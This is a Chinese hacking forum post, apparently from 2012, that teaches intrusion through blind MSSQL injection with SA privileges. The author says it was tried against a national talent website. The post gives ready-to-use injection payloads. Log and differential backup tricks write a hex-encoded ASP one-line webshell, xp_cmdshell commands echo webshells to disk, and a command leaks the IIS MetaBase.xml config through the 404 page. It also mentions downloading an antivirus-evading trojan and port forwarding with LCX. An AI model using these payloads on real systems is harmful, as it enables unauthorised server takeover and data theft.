找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2125|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————1 D# {* f$ g8 n6 N3 U# D4 l* F

3 i4 s  c  n8 f
5 G1 [8 t% _" \. V, ^1 v7 X                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
: w9 o$ b+ }3 q! b3 {9 t
+ E! H) \9 B' G                                                                 7 k7 v6 I% ]8 @4 `
                                                                 
% c) {4 d1 j5 T0 \# n9 a0 w                                                                  论坛: http://www.90team.net/
( H7 I, }8 W) [6 q4 Q3 M
+ Q: V( \# m' i' c  \+ n  B' F& p8 w$ O  l. d4 a- _9 _

/ r6 y5 S' B2 g) X& \3 g友情检测国家人才网. _0 g  I- p8 ]
- _2 q" _& }9 S  {" K& @

5 t8 q1 A1 y; s& I6 I8 I, p内容:MSSQL注入SA权限不显错模式下的入侵
) H9 w# p9 Q2 `9 `" K! v* o/ v; M; A5 }8 K! i: T$ s% g
# m  ~- |* F% a+ ^* R2 X
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
, I' r+ R2 J4 X$ P. @' p& T, d: d9 e9 B$ U
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
: b0 j0 ?* c2 ]& `' c
9 C0 F0 }$ w! s! U6 g( ~# ]) j- t& W. I( ], c7 W
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
# D* C0 R0 D" k& E( @: s  h. U/ }4 c5 b2 x( V
思路:
1 |& c8 v( k5 S; a2 Q! g+ h* i
: u& J! N5 Q, i( f首先:: o. F* v/ q) y  \0 a" u
# J$ N+ G, `0 v4 |* ^' P
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。4 P- a$ g# e; j

: I) a- s9 Y+ Q  g- Q5 @1.日志备份获得Webshell
  C9 F: p! R! d$ c$ d9 R" `4 n7 d1 x& C
2.数据库差异备份获得Webshell( b6 C3 c6 F7 P' H2 o
" v9 A. V) q' N7 f, ~% t
4.直接下载免杀远控木马。  b2 [* Z) o6 b1 w

6 t+ k) ]) M1 y4 y6 G8 D4 r' u5.直接下载LCX将服务器端口转发出来% [$ e8 Q0 z) O  D" ]

1 y2 j9 M1 \3 n* J# [5 T8 C, [# d6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。* ?1 m* l' F, E
3 b6 G9 c. a0 X- U, T0 C1 W& [

6 T# p8 z% |. V# X; l: _9 N2 d& @
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 7 G, o/ d/ b" H" v

: ^, v8 a2 {9 |1 H0 S) j我直接演示后面一个方法
# H$ d" J; X: [5 k* X- L0 Q6 W& H+ |! ^5 S7 }0 K- C
/ C' i5 i1 y5 s
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 v' T; u: u0 H$ y( x; d- ?4 u5 \3 @
$ m! v- J/ \: b

* M% s8 C* @$ n- l; u: ]
/ {' m: i% o) M9 M◆日志备份:& g7 _  S# ]+ n/ I. n& s) G2 T2 }
% J9 ~, d& C5 B% I) U
; k3 v5 Y5 e8 Z$ Y8 H) \
1. 进行初始备份
. a+ K; `7 K8 ^) t+ g, X& M/ E" r# ^; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
; u- y/ ~) g# j) \$ b9 o- z, x% |6 ]
2. 插入数据; }3 V" R( Y0 b2 L0 ~
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--  t1 N& E, |4 E7 A. ]' |6 i+ ?/ ]
7 @4 N% K* ?8 g$ [8 j; x0 Y3 ^
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' S$ x2 {, }1 v9 O0 F& @3 e( Y- N  
) E1 B( w# v9 ~9 F/ N$ |, e" e3. 备份并获得文件,删除临时表, p7 K8 S8 e, j2 i" r( q
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  \6 D+ h& c8 o8 B6 I3 z+ Z; @, K6 u; I$ j. t4 }; r7 c
: Z% u2 |1 S  F0 ]6 M; ?) P
: |3 o. r, F; s  Q4 t0 F4 u
◆数据库差异备份
  `0 P9 ~5 p& [
. ^& l' [0 ^, P7 G+ Q(1. 进行差异备份准备工作' o. {4 I: B% C( X) |( `) L  b( z

& c) y4 \1 f) f; T: Y1 N+ ^7 r9 |- r;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
9 `7 a' L- \/ l7 T( C% _& z' \! R+ y* c; I2 M& b1 N1 l. Y
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
8 X% N- k/ u$ `4 ]* o
' ?  q6 A9 R4 f' `0 ~" w: A, V# y3 I( J0 V* C9 T/ R; \
(2. 将数据写入到数据库# Y$ B1 |: I$ G. c4 D
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ( E3 ]& |9 Z) S5 d
! m" Q8 u' |9 m: `/ d
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' l% `3 d* e3 j, O8 T
: s9 o, \) y, c0 V* U3. 备份数据库并清理临时文件
) \, I4 `/ I8 {4 N
$ |- B' w. |0 d$ c2 _;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
' T0 X; p$ y: f; K) M- Z: J) O. C* ^( w" T
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
* O4 _0 ~3 c7 q: W8 X/ T' o3 I$ T  K: [. O8 _

1 _1 o7 m- B5 A* c* |& J9 m3 ^: ]4 H
用^转义字符来写ASP(一句话木马)文件的方法:   7 M) e0 e7 ~1 v. p

+ p8 V& K, r' z. T) c1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--- G4 D. L% X9 a, r( I
3 O' c2 {, p# W3 I; ], c/ W, Q8 D
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
. \$ }- B2 r1 O# j3 C- d  E& c0 j: i* A" @! S
读取IIS配置信息获取web路径
) C8 K! a" W# H( S+ W
) y4 S5 N- [- F8 r     * c4 b  V& X, ~' C7 v$ ?3 q1 P% B
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
( @: ~! O9 M* }( L
1 k' T5 |! @2 r4 h' J: D执行命令. A8 i3 K( x  [! ~7 Q
     5 ?- [! s  P  \( M( |6 I) o- _
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
+ a8 w+ K2 ^2 O5 _- `& P
( R" G3 _8 s6 Z5 E6 s( u2 A: ?" p9 x( s, q: y3 y

/ s7 K0 Q( F, M% c  W! q6 W, C" l1 P, L" x9 K: o* z" H9 V
9 h  g7 y' j5 B/ ]* T* S& B$ A. n

$ e! p* G. ^) L7 c% v* z
7 T0 O  w) s9 w; [& E
4 t( @. @* o: ]' L6 V) v
1 r$ X) A4 u' Y) F1 T/ p4 \8 x6 I0 G
2 v4 C) |% s, M( K
. \* D  o0 Z4 ^# p. l) I; A; z' ^
1 {$ t) |8 @+ @& k1 ^3 u
! T% `7 K4 l' T6 W) v2 B0 _1 i, t. l- P
2 Y& F8 M, n& S/ D$ z5 U

) u3 A% Y5 y/ s4 D6 ~" _6 S4 l9 \: U- E

0 M6 \' d4 g3 `" k$ O* Y- \6 y& l' M
/ r# B: H9 A2 m, I+ ^

1 w1 n) B4 i" H& s- B+ F9 O3 g% \$ L1 a: V2 j

- E& G4 @( J0 a( r; {0 M9 R1 N% Y. p/ |! U( o
+ M  Z4 c+ Z9 H  D) W& `7 D, }$ X

5 t/ U) v& L$ g7 @! o6 m  y" O% _2 g3 n8 H" D$ X

9 i9 J& `- l% i7 _3 e- l4 g
( B) R) R- F' R8 ^9 a
+ ~! a& i' T* g' L' }& j& Q. \* K- G+ G0 a
3 [  O$ I/ z# x- ~8 a8 ^) ?
' ]; F+ o! r" n* |3 Z9 m' b

/ U/ q, N/ _2 g
; p" d% r8 p+ D7 N
3 I- [' d+ I: ]/ l# I
, d# m* g. P0 V( y, ?7 U% l3 y6 u  |; ], o  V; X, K4 K4 v3 i0 x

$ r4 h3 J4 T4 X8 R5 L0 Y( b' w6 h

, w1 z& Z) C2 s% [0 K2 i9 \
. K" Y8 U, o  J2 L+ I; k5 X' o; {# @

, M$ x0 J, f2 |  k6 j$ n$ N
) b1 U* V% E5 N# G/ B4 ~
4 y( A4 T' Y& R) n
; w& Z& X0 K  e6 ~
7 U0 T6 ~" e: N: [+ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表